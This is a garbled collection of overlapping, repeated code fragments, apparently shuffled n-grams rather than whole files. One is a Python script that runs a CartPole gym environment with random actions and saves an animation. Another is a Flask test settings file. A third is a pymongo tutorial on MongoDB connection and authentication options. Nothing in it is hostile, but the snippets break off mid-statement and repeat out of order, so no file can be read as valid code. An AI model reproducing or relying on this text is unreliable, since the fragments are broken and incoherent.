animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です #", "display_animation from matplotlib import animation # from IPython.display import display def display_frames_as_gif(frames): \"\"\"", "from JSAnimation.IPython_display import display_animation from matplotlib import animation # from IPython.display import display", "controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim", "step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation,", "追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset()", "gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2)", "matplotlib import animation # from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a", "= plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4')", "<reponame>kitfactory/python_test<filename>reinforce.py import gym import numpy as np import matplotlib.pyplot as plt # 動画の描画関数の宣言", "200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info", "framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info = env.step(action) #", "= gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action =", "interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env", "# 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from", "as np import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb", "\"\"\" Displays a list of frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0,", "animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames =", "in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward,", "env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) #", "# 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0')", "as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import", "frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info =", "= np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info = env.step(action) # actionを実行する display_frames_as_gif(frames)", "animation # from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a list of", "frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate,", "import display_animation from matplotlib import animation # from IPython.display import display def display_frames_as_gif(frames):", "http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib import animation #", "# from JSAnimation.IPython_display import display_animation from matplotlib import animation # from IPython.display import", "frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = []", "display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset() for step", "a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def", "dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames),", "import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from", "plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(),", "action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info = env.step(action) # actionを実行する", "= [] env = gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) #", "plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') #", "anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) #", "range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done,", "numpy as np import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault #", "as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off')", "animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim,", "a list of frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72)", "plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です", "for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す", "# CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset() for step in range(0,", "patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop'))", "display def display_frames_as_gif(frames): \"\"\" Displays a list of frames as a gif, with", "CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset() for step in range(0, 200):", "env = gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action", "\"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim =", "動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib", "# display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset() for", "gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i):", "display_frames_as_gif(frames): \"\"\" Displays a list of frames as a gif, with controls \"\"\"", "import numpy as np import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault", "IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a list of frames as a", "Displays a list of frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0),", "default_mode='loop')) # CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset() for step in", "of frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch =", "plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation", "# 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib import", "anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env =", "import gym import numpy as np import matplotlib.pyplot as plt # 動画の描画関数の宣言 #", "from matplotlib import animation # from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays", "from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a list of frames as", "/xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib import animation # from IPython.display" ]
[ "SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT = False WTF_CSRF_METHODS", "app.settings import * DEBUG = False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME", "True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT = False", "* DEBUG = False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost'", "TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT", "False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False", "DEBUG = False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED", "= False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED =", "= True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT =", "= 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT = False WTF_CSRF_METHODS =", "'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT = False WTF_CSRF_METHODS = []", "import * DEBUG = False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME =", "from app.settings import * DEBUG = False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:'" ]
[ "* \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\" paragrafo", "= \"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\" paragrafo = \"Cev\" tran_titulo(titulo_principal)", "+ 5) * \"~\") print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal =", "print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso", "\"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\" paragrafo =", "5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\"", "print((x + 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python", "* \"~\") print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario", "\"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\" paragrafo = \"Cev\" tran_titulo(titulo_principal) tran_titulo(titulo_secundario)", "= len(tit) print((x + 5) * \"~\") print(f\" {tit}\") print((x + 5) *", "+ 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python no", "print((x + 5) * \"~\") print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal", "<reponame>NathanMuniz/Exercises-Python def tran_titulo(tit): x = len(tit) print((x + 5) * \"~\") print(f\" {tit}\")", "x = len(tit) print((x + 5) * \"~\") print(f\" {tit}\") print((x + 5)", "titulo_secundario = \"Curso de Python no Youtube\" paragrafo = \"Cev\" tran_titulo(titulo_principal) tran_titulo(titulo_secundario) tran_titulo(paragrafo)", "5) * \"~\") print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal = \"<NAME>\"", "def tran_titulo(tit): x = len(tit) print((x + 5) * \"~\") print(f\" {tit}\") print((x", "\"~\") print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario =", "{tit}\") print((x + 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de", "len(tit) print((x + 5) * \"~\") print(f\" {tit}\") print((x + 5) * \"~\")", "tran_titulo(tit): x = len(tit) print((x + 5) * \"~\") print(f\" {tit}\") print((x +", "titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\" paragrafo = \"Cev\"" ]
[ "by Django 2.2 on 2019-04-24 03:05 from django.db import migrations, models class Migration(migrations.Migration):", "Generated by Django 2.2 on 2019-04-24 03:05 from django.db import migrations, models class", "# Generated by Django 2.2 on 2019-04-24 03:05 from django.db import migrations, models", "('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser', name='shifts_per_roster',", "class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser',", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ]", "= [ ('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField(", "operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser', name='shifts_per_roster', field=models.IntegerField(default=10), preserve_default=False, ),", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations =", "Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name',", "Django 2.2 on 2019-04-24 03:05 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.RemoveField(", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations", "2.2 on 2019-04-24 03:05 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "03:05 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'),", "] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser', name='shifts_per_roster', field=models.IntegerField(default=10), preserve_default=False,", "on 2019-04-24 03:05 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "= [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser', name='shifts_per_roster', field=models.IntegerField(default=10), preserve_default=False, ), ]", "dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ),", "[ ('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser',", "'0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser', name='shifts_per_roster', field=models.IntegerField(default=10),", "2019-04-24 03:05 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('users',", "migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [" ]
[ "# Install pymongo using 'pip install pymongo' import urllib from pymongo import MongoClient", "certificate validation # The MONGODB-X509 mechanism authenticates a username derived from the #", "during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem')", "username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation # The MONGODB-X509", "MongoClient('localhost', 27017) # or use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client", "the URI MUST be percent escaped. client = MongoClient( \"mongodb://<access_key_id>:<secret_access_key>@localhost/?authMechanism=MONGODB-AWS\") # Check status", "admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections", "for connecting to atlas # Format : # client = pymongo.MongoClient(<Atlas connection string>)", "username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS IAM", "password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation # The MONGODB-X509 mechanism", "= MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections #", "name of the X.509 certificate presented by the driver during TLS/SSL negotiation. client", "username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using", "= MongoClient('localhost', 27017) # or use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/')", "= MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use pip3 install pymongo[tls] for", "= MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or use the entire URL", "client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use", ": # Format : # client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017)", "name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256')", "tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS IAM credentials # The access_key_id", "localhost : # Format : # client = MongoClient('<host>', port_number) client = MongoClient('localhost',", "the X.509 certificate presented by the driver during TLS/SSL negotiation. client = MongoClient('localhost',", "# distinguished subject name of the X.509 certificate presented by the driver during", "presented by the driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\",", "via URI : # Use pip3 install pymongo[tls] for connecting to atlas #", "atlas # Format : # client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient(", "% (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides the default database", "the default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva',", "certificate presented by the driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived", "tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS IAM credentials # The", "URI : # Use pip3 install pymongo[tls] for connecting to atlas # Format", "pymongo' import urllib from pymongo import MongoClient client = MongoClient() # Connect to", "into the URI MUST be percent escaped. client = MongoClient( \"mongodb://<access_key_id>:<secret_access_key>@localhost/?authMechanism=MONGODB-AWS\") # Check", "# The access_key_id and secret_access_key passed into the URI MUST be percent escaped.", "client = MongoClient() # Connect to localhost : # Format : # client", "'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username = \"Atharva\" password = r\"<PASSWORD>\" client", "overrides the default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost',", "negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS", "credentials # The access_key_id and secret_access_key passed into the URI MUST be percent", "URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI :", "MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use pip3 install", "= \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With", "import urllib from pymongo import MongoClient client = MongoClient() # Connect to localhost", "pip3 install pymongo[tls] for connecting to atlas # Format : # client =", "distinguished subject name of the X.509 certificate presented by the driver during TLS/SSL", "pymongo import MongoClient client = MongoClient() # Connect to localhost : # Format", "r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource", "= MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use pip3", "= r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here", "and Password username = \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username),", "Connections # Authenticate using AWS IAM credentials # The access_key_id and secret_access_key passed", "TLS/SSL connections with certificate validation # The MONGODB-X509 mechanism authenticates a username derived", "= pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password", "The access_key_id and secret_access_key passed into the URI MUST be percent escaped. client", "connections with certificate validation # The MONGODB-X509 mechanism authenticates a username derived from", "connecting to atlas # Format : # client = pymongo.MongoClient(<Atlas connection string>) client", "MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation # The", "MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use pip3 install pymongo[tls] for connecting", "MongoClient client = MongoClient() # Connect to localhost : # Format : #", "using 'pip install pymongo' import urllib from pymongo import MongoClient client = MongoClient()", "= MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username = \"Atharva\" password =", "MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides the default", "authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS IAM credentials", "connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username =", "authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation # The MONGODB-X509 mechanism authenticates", "Password username = \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password)))", "Authenticate using AWS IAM credentials # The access_key_id and secret_access_key passed into the", "client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections", "driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem',", "using AWS IAM credentials # The access_key_id and secret_access_key passed into the URI", "= MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation #", "import MongoClient client = MongoClient() # Connect to localhost : # Format :", "client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation", "authenticates a username derived from the # distinguished subject name of the X.509", "tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS IAM credentials #", "client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username = \"Atharva\" password", "username = \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) #", "Here authSource overrides the default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client", "Format : # client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or", "Format : # client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') #", "urllib from pymongo import MongoClient client = MongoClient() # Connect to localhost :", "use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect", "MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username = \"Atharva\" password = r\"<PASSWORD>\"", "# client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI : #", "# Authenticate using AWS IAM credentials # The access_key_id and secret_access_key passed into", "AWS IAM credentials # The access_key_id and secret_access_key passed into the URI MUST", "# Format : # client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority')", "Connect to localhost : # Format : # client = MongoClient('<host>', port_number) client", "of the X.509 certificate presented by the driver during TLS/SSL negotiation. client =", "secret_access_key passed into the URI MUST be percent escaped. client = MongoClient( \"mongodb://<access_key_id>:<secret_access_key>@localhost/?authMechanism=MONGODB-AWS\")", "client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides", "the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via", "subject name of the X.509 certificate presented by the driver during TLS/SSL negotiation.", "pymongo[tls] for connecting to atlas # Format : # client = pymongo.MongoClient(<Atlas connection", "derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS", "install pymongo[tls] for connecting to atlas # Format : # client = pymongo.MongoClient(<Atlas", "client = MongoClient('localhost', 27017) # or use the entire URL # client =", "Percent-Escaping Username and Password username = \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1'", "Install pymongo using 'pip install pymongo' import urllib from pymongo import MongoClient client", "\"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption", "# With encryption # Here authSource overrides the default database name which is", "TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') #", "authSource overrides the default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client =", "urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides the default database name which", "to atlas # Format : # client = pymongo.MongoClient(<Atlas connection string>) client =", "# The MONGODB-X509 mechanism authenticates a username derived from the # distinguished subject", "With encryption # Here authSource overrides the default database name which is admin", "encryption # Here authSource overrides the default database name which is admin #", "from the # distinguished subject name of the X.509 certificate presented by the", "Username and Password username = \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' %", "<filename>mongoDB/connections.py # Install pymongo using 'pip install pymongo' import urllib from pymongo import", "validation # The MONGODB-X509 mechanism authenticates a username derived from the # distinguished", "The MONGODB-X509 mechanism authenticates a username derived from the # distinguished subject name", "username derived from the # distinguished subject name of the X.509 certificate presented", ": # Use pip3 install pymongo[tls] for connecting to atlas # Format :", "the # distinguished subject name of the X.509 certificate presented by the driver", "database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db',", "passed into the URI MUST be percent escaped. client = MongoClient( \"mongodb://<access_key_id>:<secret_access_key>@localhost/?authMechanism=MONGODB-AWS\") #", "# or use the entire URL # client = 